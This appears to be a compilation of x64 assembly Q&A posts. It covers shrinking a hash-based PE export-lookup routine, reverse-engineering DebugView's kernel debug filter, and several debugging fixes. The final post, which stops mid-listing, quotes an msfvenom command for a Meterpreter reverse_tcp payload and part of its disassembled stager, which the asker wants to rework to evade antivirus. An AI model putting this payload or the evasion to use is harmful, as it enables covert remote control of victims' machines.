x64 Assembly Optimization - windows

I am trying to optimize several assembly procedures for size; I am not concerned about speed.
The optimizations I am familiar with are situations as follows:
;the following two lines
mov rbp, rsp
add rbp, 50h
;can be changed to
lea rbp, [rsp+50h]
What other optimizations can I use to reduce the number of bytes in the following procedure?
I am not asking anyone to fully optimize this procedure, just point out where I can improve.
;-----------------------------------------------------------------------
;asmGetProc - get procedure address by walking a module's PE export table
;In:  rcx = search key; it is compared against the value asmHsh returns
;           for each export name (see "cmp rax, rbx" below)
;     rdx = DllBase address (IMAGE_DOS_HEADER pointer)
;Out: rax = DllBase + RVA of the export whose name hash equals the key
;rcx, rdx, r8, r9, rbx and r10 are saved on entry and restored on exit.
;NOTE(review): the scan loop exits only on a hash match; r9 is never
;tested against zero, so a key with no matching export is not handled.
;-----------------------------------------------------------------------
asmGetProc proc
push rcx ;search key (copied to rbx below)
push rdx ;DllBase address (IMAGE_DOS_HEADER pointer)
push r8 ;scratch: becomes the pointer to IMAGE_EXPORT_DIRECTORY
push r9 ;scratch: name counter, starts at IMAGE_EXPORT_DIRECTORY->NumberOfNames
;and later receives IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals[r9]
push rbx ;scratch: holds the search key across the calls to asmHsh
push r10 ;scratch: pointer to IMAGE_EXPORT_DIRECTORY->AddressOfNames,
;then pointer to IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals,
;then pointer to IMAGE_EXPORT_DIRECTORY->AddressOfFunctions
mov rbx, rcx ;keep the search key in rbx (rcx is reused for each name pointer)
mov r8d, [rdx+3ch] ;IMAGE_DOS_HEADER->e_lfanew (DWORD) (Offset to IMAGE_NT_HEADERS64)
add r8, rdx ;add DllBase to the e_lfanew offset
add r8, 88h ;18h - offset of OptionalHeader inside IMAGE_NT_HEADERS64
;70h - offset of the data-directory array inside IMAGE_OPTIONAL_HEADER64
;r8 now points to the first IMAGE_DATA_DIRECTORY entry (the export directory entry)
mov r8d, [r8] ;IMAGE_DATA_DIRECTORY->VirtualAddress (DWORD)
add r8, rdx ;add DllBase to VirtualAddress (IMAGE_EXPORT_DIRECTORY)
mov r9d, [r8+18h] ;IMAGE_EXPORT_DIRECTORY->NumberOfNames
mov r10d, [r8+20h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNames (DWORD)
add r10, rdx ;add DllBase to AddressOfNames (DWORD)
for_each_function:
;step the name index down; names are visited from the last one to the first
dec r9
;load AddressOfNames[r9] into ecx
lea rcx, [r10 + 4 * r9] ;address of AddressOfNames[r9] (entries are 4-byte RVAs)
mov ecx, [rcx] ;ecx = RVA of the export's name string
add rcx, rdx ;add DllBase to string RVA DWORD
call asmHsh ;hash the function name
cmp rax, rbx ;compare the name's hash with the search key
jnz for_each_function ;no match: try the next name
;register roles from here on:
;r8 - export directory
;r9 - index of the matching name, then that name's ordinal
;r10 - AddressOfNameOrdinals / AddressOfFunctions array
;rax - final pointer to function
mov r10d, [r8+24h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals (DWORD)
add r10, rdx ;add DllBase to AddressOfNameOrdinals DWORD
mov r9w, [r10+2*r9] ;AddressOfNameOrdinals[r9] (WORD entries); only the low 16 bits of r9 are replaced
mov r10d, [r8+1ch] ;IMAGE_EXPORT_DIRECTORY->AddressOfFunctions (DWORD)
add r10, rdx ;add DllBase to AddressOfFunctions DWORD
mov eax, [r10+r9*4] ;AddressOfFunctions[r9] (DWORD entries): RVA of the function
add rax, rdx ;add DllBase to the function RVA
pop r10
pop rbx
pop r9
pop r8
pop rdx
pop rcx
ret ;return from procedure
asmGetProc endp
EDIT: Added asmHsh (my bad)
;-----------------------------------------------------------------------
;hash function (djb2 style: seed 5381, multiply by 33, XOR in each byte)
;In:  rcx - null terminated function name
;Out: rax - hash value
;rcx and rdx are saved and restored.
;The loop is do-while shaped: the first byte is hashed before any
;terminator test, so the string is expected to hold at least one character.
;-----------------------------------------------------------------------
asmHsh proc
;rcx - null terminated function name
push rcx
push rdx
mov rax, 5381d ;initial hash value
hl:
mov rdx, rax ;rdx = hash
shl rax, 5 ;rax = hash * 32
add rax, rdx ;rax = hash * 33
xor al, [rcx] ;fold the current character into the low byte
inc rcx ;advance to the next character
;check for null termination
mov dl, [rcx]
cmp dl, 00h
jne short hl ;more characters: keep hashing
pop rdx
pop rcx
ret
asmHsh endp

When optimizing assembly for space in 64-bit mode, one should: (1) use DWORD operand width when that suffices (fewer prefixes); (2) stick to the legacy x86 registers eax-edx / esi / edi / ebp (tighter encoding than r8-r15).
Hopefully what's done below illustrates the idea. ML64 assembled the original routines to 135 bytes and the modified version to 103 bytes.
Examples of changes: (1) used rbp / rsi / rdi instead of r8 / r9 / r10; (2) shrunk instruction sequences that could be accomplished via multi-component address modes; (3) used DWORD dec where the data is known to be 32-bits; (4) used IMUL in place of shift/add.
" ;- " is in front of removed lines " ;## delta " is appended to added lines, where delta is the byte difference the new code produced. No attempt was made to adjust the comments.
;-----------------------------------------------------------------------
;hash function (djb2 style: seed 5381, multiply by 33, XOR in each byte)
;Size-reduced listing. Lines starting with ";-" are instructions that were
;removed; ";## n" on a line gives the byte difference that line produced.
;In:  rcx - null terminated function name
;Out: rax - hash value
;rcx is saved and restored; rdx is no longer used, so it is not saved.
;-----------------------------------------------------------------------
asmHsh proc
;rcx - null terminated function name
push rcx
;-push rdx ;## -1
mov rax, 5381d ;initial hash value
hl:
;- mov rdx, rax
;- shl rax, 5
;- add rax, rdx
imul rax,rax,33 ;## -6 one instruction for hash * 33
xor al, [rcx] ;fold the current character into the low byte
inc rcx ;advance to the next character
;check for null termination
;-mov dl, [rcx]
;-cmp dl, 00h
cmp byte ptr [rcx], 00h ;## -2 compare in memory, no scratch register needed
jne short hl ;more characters: keep hashing
;-pop rdx ;## -1
pop rcx
ret
asmHsh endp
;-----------------------------------------------------------------------
;asmGetProc - get procedure address by walking a module's PE export table
;Size-reduced listing. Lines starting with ";-" are instructions that were
;removed; ";## n" on a line gives the byte difference that line produced.
;In:  rcx = search key; it is compared against the value asmHsh returns
;           for each export name (see "cmp rax, rbx" below)
;     rdx = DllBase address (IMAGE_DOS_HEADER pointer)
;Out: rax = DllBase + RVA of the export whose name hash equals the key
;rcx, rdx, rbp, rsi, rbx and rdi are saved on entry and restored on exit.
;NOTE(review): the scan loop exits only on a hash match; esi is never
;tested against zero, so a key with no matching export is not handled.
;-----------------------------------------------------------------------
asmGetProc proc
push rcx ;search key (copied to rbx below)
push rdx ;DllBase address (IMAGE_DOS_HEADER pointer)
;-push r8 ;pointer to IMAGE_EXPORT_DIRECTORY
push rbp ;## -1 rbp takes over r8's role
;-push r9 ;IMAGE_EXPORT_DIRECTORY->NumberOfNames
push rsi ;## -1 rsi takes over r9's role
;IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals[rsi]
push rbx ;scratch: holds the search key across the calls to asmHsh
;-push r10 ;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfNames
push rdi ;## -1 rdi takes over r10's role
;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals
;pointer to IMAGE_EXPORT_DIRECTORY->AddressOfFunctions
mov rbx, rcx ;keep the search key in rbx (rcx is reused for each name pointer)
;-mov r8d, [rdx+3ch] ;IMAGE_DOS_HEADER->e_lfanew (DWORD) (Offset to IMAGE_NT_HEADERS64)
mov ebp, [rdx+3ch] ;## -1 ebp = IMAGE_DOS_HEADER->e_lfanew
;-add r8, rdx ;add DllBase to the e_lfanew offset
;-add r8, 88h ;18h - IMAGE_NT_HEADERS64->OptionalHeader (IMAGE_OPTIONAL_HEADER64) 18h bytes
;- ;70h - skip entire IMAGE_OPTIONAL_HEADER64 structure
;- ;r8 points to the IMAGE_DATA_DIRECTORY structure
;-mov r8d, [r8] ;IMAGE_DATA_DIRECTORY->VirtualAddress (DWORD)
mov ebp, [rbp+rdx+88h] ;## -5 base + e_lfanew + 88h folded into one address: export directory RVA
;-add r8, rdx ;add DllBase to VirtualAddress (IMAGE_EXPORT_DIRECTORY)
add rbp, rdx ;## 0 rbp = pointer to IMAGE_EXPORT_DIRECTORY
;-mov r9d, [r8+18h] ;IMAGE_EXPORT_DIRECTORY->NumberOfNames
mov esi, [rbp+18h] ;## -1 esi = NumberOfNames
;-mov r10d, [r8+20h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNames (DWORD)
mov edi, [rbp+20h] ;## -1 edi = AddressOfNames RVA
;-add r10, rdx ;add DllBase to AddressOfNames (DWORD)
add rdi, rdx ;## 0 rdi = pointer to AddressOfNames
for_each_function:
;step the name index down; names are visited from the last one to the first
;- dec r9
dec esi ;## -1
;load AddressOfNames[rsi] into ecx
;- lea rcx, [r10 + 4 * r9] ;AddressOfNames[i] - function string RVA (relative virtual address)
;- mov ecx, [rcx] ;r11d is the AddressOfName[r9] RVA (DWORD)
mov ecx, [rdi + 4 * rsi] ;## -3 ecx = RVA of the export's name string
add rcx, rdx ;add DllBase to string RVA DWORD
call asmHsh ;hash the function name
cmp rax, rbx ;compare the name's hash with the search key
jnz for_each_function ;no match: try the next name
;register roles from here on:
;rbp - export directory
;rsi - index of the matching name, then that name's ordinal
;rdi - AddressOfNameOrdinals / AddressOfFunctions array
;rax - final pointer to function
;-mov r10d, [r8+24h] ;IMAGE_EXPORT_DIRECTORY->AddressOfNameOrdinals (DWORD)
mov edi, [rbp+24h];## -1
;-add r10, rdx ;add DllBase to AddressOfNameOrdinals DWORD
add rdi, rdx; ## 0
;-mov r9w, [r10+2*r9] ;AddressOfNameOrdinals[2*r9] - (2*r9 = 2 bytes * function name counter)
mov si, [rdi+2*rsi] ;## -1 AddressOfNameOrdinals[rsi] (WORD entries); only the low 16 bits of rsi are replaced
;-mov r10d, [r8+1ch] ;IMAGE_EXPORT_DIRECTORY->AddressOfFunctions (DWORD)
mov edi, [rbp+1ch] ;## -1
;-add r10, rdx ;add DllBase to AddressOfFunctions DWORD
add rdi, rdx ;## 0
;-mov eax, [r10+r9*4] ;AddressOfFunctions[4*r9] - (4*r9 = 4 bytes * function ordinal)
mov eax, [rdi+rsi*4] ; ## -1 AddressOfFunctions[rsi] (DWORD entries): RVA of the function
add rax, rdx ;add DllBase to the function RVA
;-pop r10
pop rdi ; ## -1
pop rbx
;-pop r9
pop rsi
;-pop r8
pop rbp ;## -1
pop rdx
pop rcx
ret ;return from procedure
asmGetProc endp

Related

What does DebugView's "Enable Verbose Kernel Output" do?

I've followed Microsoft's "Write a Hello World Windows Driver (KMDF)" and wasn't sure how to see the output in WinDbg. After trying to set the Debug Print Filter registry value to 0xFFFFFFFF, rebooting and other rain dance solutions, the one thing that worked was enabling DebugView's "Enable Verbose Kernel Output" option. Now, WinDbg shows debug output. It's too verbose, but at least it's there.
So what did DebugView modify for WinDbg to show more verbose debug output?
I'm running WinDbg attached to a VM from my Windows host with a bridged connection.
TL;DR: it calls a driver to repeatedly call NtSetDebugFilterState on all kernel components, so that they are all able to print something on the debug output.
Program
Let's start with the program itself; there's only one occurrence of the string "Enable Verbose Kernel Output":
mov [rsp+78h+mi.wID], 9C7Ch
lea rax, aEnableVerboseK ; "Enable &Verbose Kernel Output"
sbb ecx, ecx
mov [rsp+78h+mi.dwTypeData], rax
and ecx, 8
mov [rsp+78h+mi.fState], ecx
mov rcx, cs:hMenu ; hMenu
call cs:GetSubMenu
mov rcx, rax ; hmenu
lea r9, [rsp+78h+mi] ; lpmi
lea edx, [rdi+3] ; item
lea r8d, [rdi+1] ; fByPosition
call cs:InsertMenuItemA
The above code inserts the sub-menu item into the main menu. What's important here is the menu ID, namely 0x9C7C.
This menu ID is used only once more here:
movzx edx, al ; al can either be 0 or 1
xor edi, edi
mov qword ptr [rsp+830h+iNumButtons], rdi ; lpOverlapped
lea rax, [rsp+830h+BytesReturned]
mov [rsp+830h+lpButtons], rax ; lpBytesReturned
xor edx, 1
mov dword ptr [rsp+830h+wBMID], edi ; nOutBufferSize
xor r9d, r9d ; nInBufferSize
xor r8d, r8d ; lpInBuffer
mov [rsp+830h+dwInitParam], rdi ; lpOutBuffer
lea edx, ds:0FFFFFFFF8305003Ch[rdx*4] ; dwIoControlCode
call cs:DeviceIoControl
movzx eax, cs:byte_1400935A3
mov edx, 9C7Ch ; uIDCheckItem
mov rcx, cs:hMenu ; hMenu
mov cs:byte_1400A2776, al
neg al
sbb r8d, r8d
and r8d, 8 ; uCheck
call cs:CheckMenuItem
The above code calls DeviceIoControl and then checks the menu item. The former means the program is actually talking with a device driver.
If we remove a bit of code we can see which IOCTL can be sent to the driver:
movzx edx, al ; al can either be 0 or 1
; snip
xor edx, 1 ; invert AL
; snip
lea edx, ds:0FFFFFFFF8305003Ch[rdx*4] ; dwIoControlCode
call cs:DeviceIoControl
Since RDX can be either 0 or 1 we end up with (base 10):
[rdx*4-2096824260]
Thus:
4 - 2096824260 = -2096824256
0 - 2096824260 = -2096824260
Looking at the handles opened by dbgview64.exe we can see a \Device\dbgv is currently opened.
0: kd> !devobj \Device\dbgv
Device object (ffffd58a97007630) is for:
Dbgv \Driver\DBGV DriverObject ffffd58a8688aaa0
Current Irp 00000000 RefCount 0 Type 00008305 Flags 00000048
SecurityDescriptor ffffe58fb8bdeea0 DevExt 00000000 DevObjExt ffffd58a97007780
ExtensionFlags (0x00000800) DOE_DEFAULT_SD_PRESENT
Characteristics (0000000000)
Device queue is not busy.
0: kd> dt _driver_object ffffd58a8688aaa0
nt!_DRIVER_OBJECT
+0x000 Type : 0n4
+0x002 Size : 0n336
+0x008 DeviceObject : 0xffffd58a`97007630 _DEVICE_OBJECT
+0x010 Flags : 0x12
+0x018 DriverStart : 0xfffff800`dcf90000 Void
+0x020 DriverSize : 0x9000
+0x028 DriverSection : 0xffffd58a`a3ba9be0 Void
+0x030 DriverExtension : 0xffffd58a`8688abf0 _DRIVER_EXTENSION
+0x038 DriverName : _UNICODE_STRING "\Driver\DBGV"
+0x048 HardwareDatabase : 0xfffff800`8372e990 _UNICODE_STRING "\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\SYSTEM"
+0x050 FastIoDispatch : (null)
+0x058 DriverInit : 0xfffff800`dcf97058 long +0
+0x060 DriverStartIo : (null)
+0x068 DriverUnload : (null)
+0x070 MajorFunction : [28] 0xfffff800`dcf91b80 long +0
0: kd> dt nt!_LDR_DATA_TABLE_ENTRY 0xffffd58a`a3ba9be0 Full*
+0x048 FullDllName : _UNICODE_STRING "\??\C:\WINDOWS\system32\Drivers\Dbgv.sys"
So the driver is currently loaded from C:\WINDOWS\system32\Drivers\Dbgv.sys (or you can extract it from the .rsrc section...).
Driver
Looking at the driver, in the driver entry we spot the function used for IRP_MJ_DEVICE_CONTROL:
lea rax, sub_180001B80
mov [rdi+0E0h], rax ; IRP_MJ_DEVICE_CONTROL
mov [rdi+80h], rax
mov [rdi+70h], rax
Inside that function we have the usual setup before calling the right IOCTL:
movzx eax, [rcx+_IO_STACK_LOCATION.MajorFunction]
mov r9d, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.OutputBufferLength]
mov r10d, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.IoControlCode]
test al, al ; IRP_MJ_CREATE
jz loc_180001C6C
cmp al, 2 ; IRP_MJ_CLOSE
jz short loc_180001C0C
cmp al, 0Eh ; IRP_MJ_DEVICE_CONTROL
jnz ##CompleteRequest
mov eax, r10d
and eax, 3
cmp al, METHOD_NEITHER
jnz short loc_180001BDF
mov rdx, [rdi+_IRP.UserBuffer]
loc_180001BDF:
mov [rsp+98h+do], r11 ; _DEVICE_OBJECT*
mov [rsp+98h+IoStatus], rbx ; IoStatus
mov [rsp+98h+ioctl], r10d ; IoCtl
mov [rsp+98h+OutputBufferLength], r9d ; OuputBufferLength
mov r9d, [rcx+_IO_STACK_LOCATION.Parameters.DeviceIoControl.InputBufferLength] ; int
mov rcx, [rcx+_IO_STACK_LOCATION.FileObject]
mov qword ptr [rsp+98h+Buffer], rdx ; Buffer
mov dl, 1 ; int
call sub_1800017E0
jmp ##CompleteRequest
Inside the call (sub_1800017E0) we have a big switch for the IOCTL, here's the case -2096824260 (case -2096824256 is slightly different):
loc_1800018B9:
call sub_180002470 ; jumptable 000000018000182F case -2096824260
jmp loc_180001AEB
This function is mostly comprised of two loops:
loc_1800024A0:
xor ebx, ebx
##LoopQuerySetDebugFilter:
mov edx, ebx
mov ecx, esi
call cs:qword_180005438 ; DbgQueryDebugFilterState
mov r8b, 1 ; State
mov edx, ebx ; Level (keeps incrementing up to 0x1E)
mov ecx, esi ; ComponentId (keeps incrementing up to 0x82)
mov [rdi], al ; save current state.
call cs:qword_180005440 ; DbgSetDebugFilterState
inc ebx
inc rdi
cmp ebx, 1Eh
jb short ##LoopQuerySetDebugFilter
inc esi
cmp esi, 82h ; '‚'
jb short loc_1800024A0
Both calls are on DbgQueryDebugFilterState and DbgSetDebugFilterState (reactos source)
which is just a minimal wrapper around NtSetDebugFilterState (reactos source).
As far as we can see the debug filter state is queried, saved, and then set for all kernel components (following is the component tables from the kernel, there are a lot of them):
.rdata:00000001400073E0 KdComponentTable dq offset Kd_SYSTEM_Mask
.rdata:00000001400073E0 ; DATA XREF: NtQueryDebugFilterState+36↓o
.rdata:00000001400073E0 ; NtSetDebugFilterState+43↓o ...
.rdata:00000001400073E8 dq offset Kd_SMSS_Mask
.rdata:00000001400073F0 dq offset Kd_SETUP_Mask
.rdata:00000001400073F8 dq offset Kd_NTFS_Mask
.rdata:0000000140007400 dq offset Kd_FSTUB_Mask
.rdata:0000000140007408 dq offset Kd_CRASHDUMP_Mask
.rdata:0000000140007410 dq offset Kd_CDAUDIO_Mask
.rdata:0000000140007418 dq offset Kd_CDROM_Mask
.rdata:0000000140007420 dq offset Kd_CLASSPNP_Mask
....
Which finally means that all kernel components are able to print something to the debug output.
Note that the other IOCTL just resets the component masks to what they were before the menu item was checked in the main program.

Reversing an array and printing it in x86-64

I am trying to print an array, reverse it, and then print it again. I manage to print it once. I can also make 2 consecutive calls to _printy and it works. But the code breaks with the _reverse function. It does not segfault, it exits with code 24 (I looked online but this seems to mean that the maximum number of file descriptors has been exceeded, and I cannot get what this means in this context). I stepped with a debugger and the loop logic seems to make sense.
I am not passing the array in RDI, because _printy restores the content of that register when it exits. I also tried to load it directly into RDI before calling _reverse but that does not solve the problem.
I cannot figure out what the problem is. Any idea?
BITS 64
DEFAULT REL
; -------------------------------------
; -------------------------------------
; PRINT LIST
; -------------------------------------
; -------------------------------------
%define SYS_WRITE 0x02000004
%define SYS_EXIT 0x02000001
%define SYS_OPEN 0x02000005
%define SYS_CLOSE 0x02000006
%define SYS_READ 0x02000003
%define EXIT_SUCCESS 0
%define STDOUT 1
%define LF 10
%define INT_OFFSET 48
section .text
extern _printf
extern _puts
extern _exit
global _main
; ----------------------------------------------------------------------
; _main: print the array, reverse it in place, print it again, exit(0).
; ABI: System V AMD64 (macOS).
; _printy and _reverse both return with rdi = address of `array`, so the
; pointer is loaded only once.
; ----------------------------------------------------------------------
_main:
    push    rbp                     ; entry rsp is 8 mod 16; this push aligns it for the calls below
    lea     rdi, [rel array]
    call    _printy
    call    _reverse
    call    _printy
    ; The exit status is passed in edi. Without setting it, the status is
    ; whatever rdi holds on return from _printy (the array address).
    mov     edi, EXIT_SUCCESS
    ; rbp is deliberately not popped: _exit does not return, and keeping the
    ; push in place leaves rsp 16-byte aligned at the call.
    call    _exit
; ----------------------------------------------------------------------
; _reverse: reverse `length` 32-bit elements in place.
; In:    rdi = address of the first element
; Out:   rax = 0, rdi = address of `array` (reloaded for the next call)
; Clobb: rsi, r8, r9, flags
; Elements are declared with `dd` (4 bytes each), so every load and store
; must be 32 bits wide. 64-bit moves would also swap the neighbouring
; element and, at the high end, the bytes that follow the array.
; ----------------------------------------------------------------------
_reverse:
    push    rbp
    lea     rsi, [rdi + 4 * (length - 1)]   ; rsi -> last element
.LOOP2:
    cmp     rdi, rsi
    jae     .DONE2                  ; pointers met or crossed (unsigned compare for addresses)
    mov     r8d, [rdi]              ; r8d = front element
    mov     r9d, [rsi]              ; r9d = back element
    mov     [rdi], r9d
    mov     [rsi], r8d
    add     rdi, 4                  ; front moves up one element
    sub     rsi, 4                  ; back moves down one element
    jmp     .LOOP2
.DONE2:
    xor     eax, eax
    lea     rdi, [rel array]
    pop     rbp
    ret
; ----------------------------------------------------------------------
; _printy: print `length` 32-bit integers with printf(msg, value).
; In:    rdi = address of the first element
; Out:   rax = 0, rdi = address of `array` (reloaded for the next call)
; Clobb: rcx, rsi, r8 and whatever _printf clobbers
; Stack: push rbp + push rcx + push r8 leave rsp 16-byte aligned at the
;        call to _printf.
; ----------------------------------------------------------------------
_printy:
    push    rbp
    xor     ecx, ecx                ; rcx = element index
    mov     r8, rdi                 ; r8 = array base (rdi is needed for the format string)
.loop:
    cmp     rcx, length
    jge     .done
    push    rcx                     ; rcx and r8 are caller-saved: keep them across printf
    push    r8
    lea     rdi, [rel msg]
    mov     esi, [r8 + rcx * 4]     ; 32-bit load: elements are dd, and a qword load would read past the last one
    xor     eax, eax                ; variadic call: al = number of vector registers used (none)
    call    _printf
    pop     r8
    pop     rcx
    add     rcx, 1
    jmp     .loop
.done:
    xor     eax, eax
    lea     rdi, [rel array]
    pop     rbp
    ret
section .data
array: dd 78, 2, 3, 4, 5, 6
length: equ ($ - array) / 4
msg: db "%d => ", 0
Edit with some info from the debugger
Stepping into the _printy function gives the following msg, once reaching the call to _printf.
* thread #1, queue = 'com.apple.main-thread', stop reason = step over failed (Could not create return address breakpoint.)
frame #0: 0x0000000100003f8e a.out`printf
a.out`printf:
-> 0x100003f8e <+0>: jmp qword ptr [rip + 0x4074] ; (void *)0x00007ff80258ef0b: printf
0x100003f94: lea r11, [rip + 0x4075] ; _dyld_private
0x100003f9b: push r11
0x100003f9d: jmp qword ptr [rip + 0x5d] ; (void *)0x00007ff843eeb520: dyld_stub_binder
I am not an expert, but a quick research online led to the following
During the 'thread step-out' command, check that the memory we are about to place a breakpoint in is executable. Previously, if the current function had a nonstandard stack layout/ABI, and had a valid data pointer in the location where the return address is usually located, data corruption would occur when the breakpoint was written. This could lead to an incorrectly reported crash or silent corruption of the program's state. Now, if the above check fails, the command safely aborts.
So after all this might not be a problem (I am also able to track the execution of the printf call). But this is really the only understandable piece of information I am able to extract from the debugger. Deep in some quite obscure (to me) function calls I reach this
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff80256db7f libsystem_c.dylib`flockfile + 10
libsystem_c.dylib`flockfile:
-> 0x7ff80256db7f <+10>: call 0x7ff8025dd480 ; symbol stub for: __error
0x7ff80256db84 <+15>: mov r14d, dword ptr [rax]
0x7ff80256db87 <+18>: mov rdi, qword ptr [rbx + 0x68]
0x7ff80256db8b <+22>: add rdi, 0x8
Target 0: (a.out) stopped.
(lldb)
Process 61913 stopped
* thread #1, queue = 'com.apple.main-thread', stop reason = instruction step into
frame #0: 0x00007ff8025dd480 libsystem_c.dylib`__error
This is one of the function calls happening in _printf.
Ask further questions if there is something more I can do.
Your array consists of int32 numbers aka dd in nasm terminology, but your swap operates on 64 bit numbers:
mov r8, [rdi]
mov r9, [rsi]
mov [rdi], r9
mov [rsi], r8
Assuming you were not after some crazy optimizations where you swap a pair of elements simultaneously you want this to remain in 32 bits:
mov r8d, [rdi]
mov r9d, [rsi]
mov [rdi], r9d
mov [rsi], r8d

How to break infinite loop assembly Windows x64

I'm trying to add arrA and arrB element by element, store the sums in arrC, and print them out. Once I run the code, it goes into an infinite loop. How can I break out of the loop? Any suggestions are greatly appreciated.
; ----------------------------------------------------------------------
; Adds arrA and arrB element by element (byte arithmetic), stores each sum
; in arrC and prints it in hex followed by ", ".
; Syntax: MASM (ml64).  ABI: Microsoft x64.
; Assumes WriteHex64 prints the value in RAX and WriteString prints the
; null-terminated string addressed by RDX, as the original call sequence
; implies - confirm against the I/O library in use.
; ----------------------------------------------------------------------
ExitProcess PROTO
WriteHex64 PROTO
WriteString PROTO

.data
arrA BYTE 10h, 30h
arrB BYTE 0E0h, 40h
arrC BYTE 0, 0
string BYTE ", ", 00h

.code
main PROC
    push    r12                     ; non-volatile loop counter; the push also aligns rsp to 16
    sub     rsp, 20h                ; 32-byte shadow space required by every call
    lea     rdi, arrA               ; rdi, rsi, rbx are non-volatile, so they survive the calls
    lea     rsi, arrB
    lea     rbx, arrC
    mov     r12d, LENGTHOF arrA     ; elements left to process
L1:
    movzx   eax, BYTE PTR [rdi]     ; rax = arrA[i], zero-extended
    add     al, [rsi]               ; al = arrA[i] + arrB[i] (wraps at 8 bits)
    mov     [rbx], al               ; arrC[i] = sum; a byte store, so neighbours are untouched
    add     rdi, TYPE arrA
    add     rsi, TYPE arrB
    add     rbx, TYPE arrC
    call    WriteHex64              ; rax still holds the zero-extended sum
    lea     rdx, string             ; rdx is volatile: reload it before every call
    call    WriteString
    ; rcx is volatile across calls, so "loop L1" never counted down
    ; reliably. The counter lives in r12 instead.
    dec     r12
    jnz     L1
    xor     ecx, ecx                ; exit code 0
    call    ExitProcess
main ENDP
END

is there a difference between al and dl? [duplicate]

This question already has answers here:
How do AX, AH, AL map onto EAX?
(6 answers)
Closed 2 years ago.
First, it is my first assembly. And I use it with "NASM" and "64bit ASM" and "Intel" code and Mac OS.
When I try to write strdup function, it didn't work with al.
In using my strdup function, the string was broken.
So, my code is here.
; ----------------------------------------------------------------------
; _strdup (variant that uses al as the copy temporary)
; In:  rdi = null-terminated source string
; Out: rax = pointer returned by _malloc, or 0 if the allocation failed
; NOTE: al is the low byte of rax, and rax holds the destination pointer
; during the copy loop, so every load into al alters that pointer.
; ----------------------------------------------------------------------
global _strdup
extern _malloc
section .text
_strdup:
xor rcx, rcx ; rcx = 0: length counter
jmp strlen
strlen:
cmp [rdi + rcx], byte 0 ; reached the terminator?
je malloc
inc rcx
jmp strlen
malloc:
inc rcx ; one more byte for the terminator
push rdi ; keep the source pointer across the call
mov rdi, rcx ; argument for _malloc: number of bytes
call _malloc
pop rdi
cmp rax, 0 ; _malloc's result is in rax
je error
xor rcx, rcx ; restart the index for the copy
jmp copy
copy:
mov al, byte [rdi + rcx] ; overwrites the low byte of rax, i.e. of the destination pointer
mov byte [rax + rcx], al ; the store goes through the modified rax
cmp al, byte 0 ; copied the terminator?
je return
jmp increment
increment:
inc rcx
jmp copy
error:
mov rax, 0
ret
return:
ret ; rax is returned as it stands after the copy loop
But, when I write same code with dl not al, it works!
; ----------------------------------------------------------------------
; char *_strdup(const char *s)
; In:    rdi = null-terminated source string
; Out:   rax = pointer returned by _malloc holding a copy of s,
;              or 0 if the allocation failed
; Clobb: rcx, dl, flags (plus whatever _malloc clobbers); rdi is restored
; dl is the copy temporary, so rax (the destination pointer) stays intact.
; ----------------------------------------------------------------------
global _strdup
extern _malloc
section .text
_strdup:
    xor     ecx, ecx                ; rcx = number of characters counted so far
.measure:
    cmp     byte [rdi + rcx], 0
    je      .allocate
    inc     rcx
    jmp     .measure
.allocate:
    inc     rcx                     ; one more byte for the terminator
    push    rdi                     ; keep the source pointer across the call
    mov     rdi, rcx
    call    _malloc
    pop     rdi
    test    rax, rax
    jz      .finish                 ; allocation failed: rax is already 0
    xor     ecx, ecx                ; rcx = copy index
.copy:
    mov     dl, [rdi + rcx]
    mov     [rax + rcx], dl
    test    dl, dl                  ; terminator copied?
    jz      .finish
    inc     rcx
    jmp     .copy
.finish:
    ret
I don't know why dl works and the difference between al and dl.
Anyone know about it? Thanks.
al is the smallest part of rax while dl is the smallest part of rdx. Changing al will change the value of rax as well.
Why your code is not working with al?
copy:
mov al, byte [rdi + rcx] ; you move "byte [rdi + rcx]" in "al"
; thus changing the value of "rax" as well.
; the result of the following statement becomes unexpected
mov byte [rax + rcx], al
But when you do it with dl, rax is not affected and hence your program works as expected.
Try the following code and run it through a debugger to see the effect of changing the value of al on rax:
section .text
global main
main:
nop
mov rax, 1000
mov al, byte 10
nop
Result:
After mov rax, 1000, value of rax: 1000
00000000 00000000 00000000 00000000 00000000 00000000 00000011 11101000
After mov al, 10, value of rax: 778
00000000 00000000 00000000 00000000 00000000 00000000 00000011 00001010
^^^^^^^^
So, changing al will affect rax.

X64 ASSEMBLY - Cannot run compiled and linked raw shellcode in Windows

After using metasploit's windows/x64/meterpreter/reverse_tcp shellcode on my windows 10 machine (with AVs turned off), I decided to try to create a hand-made polymorphic, null-free and custom-encoded version of the same shellcode (with the hope of evading my AVs).
To test my work flow, I produced a raw output of the shellcode using:
msfvenom -p windows/x64/meterpreter/reverse_tcp -f raw -a x64 --platform windows LHOST='my IP address' | ndisasm -b 64 -
global _start
section .text
_start:
cld
and rsp,byte -0x10
call first_call ;dword 0xd6
push r9
push r8
push rdx
push rcx
push rsi
xor rdx,rdx
mov rdx,[gs:rdx+0x60]
mov rdx,[rdx+0x18]
mov rdx,[rdx+0x20]
fifth_jmp:
mov rsi,[rdx+0x50]
movzx rcx,word [rdx+0x4a]
xor r9,r9
xor rax,rax
lodsb
cmp al,0x61
jl 0x37
sub al,0x20
ror r9d,0xd
add r9d,eax
loop 0x2d
push rdx
push r9
mov rdx,[rdx+0x20]
mov eax,[rdx+0x3c]
add rax,rdx
cmp word [rax+0x18],0x20b
jnz first_jmp ;dword 0xcb
mov eax,[rax+0x88]
test rax,rax
jz first_jmp ;0xcb
add rax,rdx
push rax
mov ecx,[rax+0x18]
mov r8d,[rax+0x20]
add r8,rdx
fourth_jmp:
jrcxz second_jmp ;0xca
dec rcx
mov esi,[r8+rcx*4]
add rsi,rdx
xor r9,r9
third_jmp:
xor rax,rax
lodsb
ror r9d,0xd
add r9d,eax
cmp al,ah
jnz third_jmp
add r9,[rsp+0x8]
cmp r9d,r10d
jnz fourth_jmp ;0x72
pop rax
